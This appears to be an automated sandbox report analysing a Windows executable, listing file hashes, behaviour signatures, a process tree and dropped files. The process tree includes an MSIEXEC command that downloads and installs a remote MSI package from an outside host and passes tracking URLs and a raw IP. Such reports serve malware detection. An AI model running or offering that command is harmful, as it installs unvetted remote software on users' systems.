Analysis

  • max time kernel
    16s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    25/08/2024, 07:04

General

  • Target

    ecb85d95c4aca1202e34c2b125a2c250N.exe

  • Size

    1.4MB

  • MD5

    ecb85d95c4aca1202e34c2b125a2c250

  • SHA1

    7ab9fe65804ab65b141b61d5d78d1cd51863a5f3

  • SHA256

    65ec76bf52dbdb94fa4fb5d83b6445f910c33a5288f618e7d91385be660f17eb

  • SHA512

    0231e6cd4edba9658d7ec17f69dfc859898af4e86107fca1add797ad97861cc908f2589cfcc6946f6c0da0095dbc2606292a2ba1a395e2541878c2f905365df9

  • SSDEEP

    24576:SaQv0pic0lIpgYtQsCeya+QuVBY/H/wUUG/y324CDDlUNbaIWMi:Sa1peIVQsTCYf4LGvvDRUgHMi

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ecb85d95c4aca1202e34c2b125a2c250N.exe
    "C:\Users\Admin\AppData\Local\Temp\ecb85d95c4aca1202e34c2b125a2c250N.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1928
    • C:\Users\Admin\AppData\Local\Temp\~pcicvvgipa.tmp
      "C:\Users\Admin\AppData\Local\Temp\~pcicvvgipa.tmp"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1444
      • C:\Windows\SysWOW64\MSIEXEC.EXE
        MSIEXEC.EXE /i "http://pliuht.cdnpckgs.eu/client/pkgs/allstar/All Star Slots20160209125305.msi" DDC_DID=1454323 DDC_RTGURL=http://www.cdnfile.eu/dl/TrackSetup/TrackSetup.aspx?DID=1454323 DDC_UPDATESTATUSURL=http://190.4.94.65:8080/allstar/Lobby.WebServices/Installer.asmx DDC_SIGNUPURL=http://190.4.94.65:8080/allstar/Lobby.WebSite/SignUpUnsecure.aspx SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp" SETUPEXENAME="~pcicvvgipa.tmp"
        3⤵
        • Use of msiexec (install) with remote resource
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:2756

Network

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\_isB59E.tmp

          Filesize

          1KB

          MD5

          7517b9e0ebd0104cc79ba81384274cdb

          SHA1

          c5427d7b52d533deabb4902641eeb6e2bf2c865e

          SHA256

          038bf4e17f9344d1eaa5d2de9a41fa4ebd771efeaf0779765fa428b8105b9c93

          SHA512

          a51b53e72ad13baa1f1cfd845af8fde96f4afec4065119c2a597313c1dc8c67043c8375ca54601035d22d84b50cc73f9d884cd85180cdeaa2f21805c1bee20d0

        • C:\Users\Admin\AppData\Local\Temp\{0C0E2779-9CB7-4920-A437-37A84C0F3098}\0x0409.ini

          Filesize

          21KB

          MD5

          be345d0260ae12c5f2f337b17e07c217

          SHA1

          0976ba0982fe34f1c35a0974f6178e15c238ed7b

          SHA256

          e994689a13b9448c074f9b471edeec9b524890a0d82925e98ab90b658016d8f3

          SHA512

          77040dbee29be6b136a83b9e444d8b4f71ff739f7157e451778fb4fccb939a67ff881a70483de16bcb6ae1fea64a89e00711a33ec26f4d3eea8e16c9e9553eff

        • C:\Users\Admin\AppData\Local\Temp\{0C0E2779-9CB7-4920-A437-37A84C0F3098}\_ISMSIDEL.INI

          Filesize

          20B

          MD5

          db9af7503f195df96593ac42d5519075

          SHA1

          1b487531bad10f77750b8a50aca48593379e5f56

          SHA256

          0a33c5dffabcf31a1f6802026e9e2eef4b285e57fd79d52fdcd98d6502d14b13

          SHA512

          6839264e14576fe190260a4b82afc11c88e50593a20113483851bf4abfdb7cca9986bef83f4c6b8f98ef4d426f07024cf869e8ab393df6d2b743b9b8e2544e1b

        • C:\Users\Admin\AppData\Local\Temp\~B57C.tmp

          Filesize

          5KB

          MD5

          b988e8eaf0e2b9e295ba59d624190f34

          SHA1

          3e74acee428150c0bf1d0444a3a2dc5fc22a6307

          SHA256

          4c77c6717782314118d016fd6cba0d355cc64bbcf5a0d7aaf7284e5591d660a8

          SHA512

          5236d29a8cd49fb59a786af0b9b2151a639d9e3675fe1ae9ac6ba17660340bca905ff2e37667a1db02092a35175b1e5423e4deebfcbc46ed61458dbf9c339c87

        • \Users\Admin\AppData\Local\Temp\~pcicvvgipa.tmp

          Filesize

          1.2MB

          MD5

          b805b8500a08be1317384b954ae0acff

          SHA1

          091521daaf9d208b4fad59d1bec273779cebbae8

          SHA256

          f03dcb8a1c3099081cb9fec98369c4c55840b0ecae421b670c5b5cdaf64f0bea

          SHA512

          b543f30ec61f2d1d6a9400af585576cdb69709eec9b51c14534fc89382fde945b9d0353393a66afc29f935a87ea4523bc044a7a51e1895253398eba676d5bad7